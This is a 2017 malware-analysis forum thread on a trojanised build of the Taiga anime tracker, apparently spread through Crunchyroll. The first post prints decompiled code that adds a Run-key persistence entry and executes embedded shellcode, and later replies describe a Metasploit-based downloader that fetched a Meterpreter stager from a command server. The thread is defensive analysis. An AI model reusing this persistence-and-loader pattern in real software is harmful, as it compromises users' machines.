Malware from Crunchyroll

Forum for analysis and discussion about malware.
Post Reply
User avatar
EP_X0FF
Global Moderator
Posts: 4808
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Malware from Crunchyroll

Post by EP_X0FF » Sun Nov 05, 2017 3:09 am

Malware targeting viewers of the chinese porn cartoons. Modified version of Taiga (https://github.com/erengy/taiga/issues/489).

Masterpiece of code (f5 in idapro)

Code: Select all

  if ( GetModuleFileNameW(0, &Filename, 0x104u) != -1
    && !RegCreateKeyExW(
          HKEY_CURRENT_USER,
          L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
          0,
          0,
          0,
          0x20006u,
          0,
          &phkResult,
          0) )
  {
    RegSetValueExW(phkResult, L"Java", 0, 1u, (const BYTE *)&Filename, 2 * wcslen(&Filename) + 2);
  }
  v4 = VirtualAlloc(0, 0x18Bu, 0x1000u, 0x40u);
  qmemcpy(v4, &unk_412780, 0x18Bu);
  ((void (*)(void))v4)();
In attach modified taiga and downloader exe dropped by above shellcode and implemented also through shellcode. I don't have actual payload it downloads but also don't expect anything interesting from it (probably some of retarded ransomwares which is not interesting at all in any case).
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration

sysopfb
Posts: 96
Joined: Thu Oct 23, 2014 1:22 am
Contact:

Re: Malware from Crunchyroll

Post by sysopfb » Sun Nov 05, 2017 8:49 pm

This has a pcap of it downloading a payload from when it was live. Kudos to any.run for reaching out to Bart on twitter about the pcap

https://app.any.run/tasks/010df394-dad9 ... 0892cde074

The decoded code from the embedded PE in the modified taiga program looks like it was based on metasploits receive asm code which just takes a dword value from the C2 then reads in that dword in size before RET jumping to the new code it downloaded from the C2.

There is also a pcap from when it was live on hybrid-analysis but the C2 didn't send anything which makes the code exit.

sysopfb
Posts: 96
Joined: Thu Oct 23, 2014 1:22 am
Contact:

Re: Malware from Crunchyroll

Post by sysopfb » Mon Nov 06, 2017 2:08 pm

Payload on that pcap was metsrv, meterpreters fileless stager.
You do not have the required permissions to view the files attached to this post.

Post Reply